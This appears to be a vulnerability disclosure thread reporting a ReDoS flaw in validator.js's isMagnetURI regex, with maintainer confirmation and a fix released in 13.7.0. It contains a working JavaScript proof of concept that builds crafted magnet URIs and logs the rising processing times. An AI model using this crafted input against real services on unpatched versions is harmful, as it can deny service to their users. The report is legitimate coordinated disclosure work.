Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 17th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows cause a denial of service when validating crafted invalid MagnetURIs.

The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'magnet:?xt=urn:a:'+'a'.repeat(32)+'&dn='+'&tr='.repeat(i*10000)+"\r\na\r\n";
    validator.isMagnetURI(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
Sarhan Aissi validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
2 months ago

Maintainer


Thank you Yeting Li for reporting this ReDOS. A fix has been submitted and is awaiting merge!

Yeting Li
2 months ago

Researcher


Hi, Sarhan, thank you for your confirmation. And I just checked that the fixed regex is safe.

Jamie Slome
2 months ago

Admin


Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.

Thanks! 🎊

Yeting Li
a month ago

Researcher


Hi @admin, can you assign a CVE?

Jamie Slome
a month ago

Admin


@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.

We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.

Sarhan Aissi confirmed that a fix has been merged on 737694 a month ago
The fix bounty has been dropped
isMagnetURI.js#L3 has been validated
Sarhan Aissi
a month ago

Maintainer


Thank you guys! We finally released the fix in validator 13.7.0.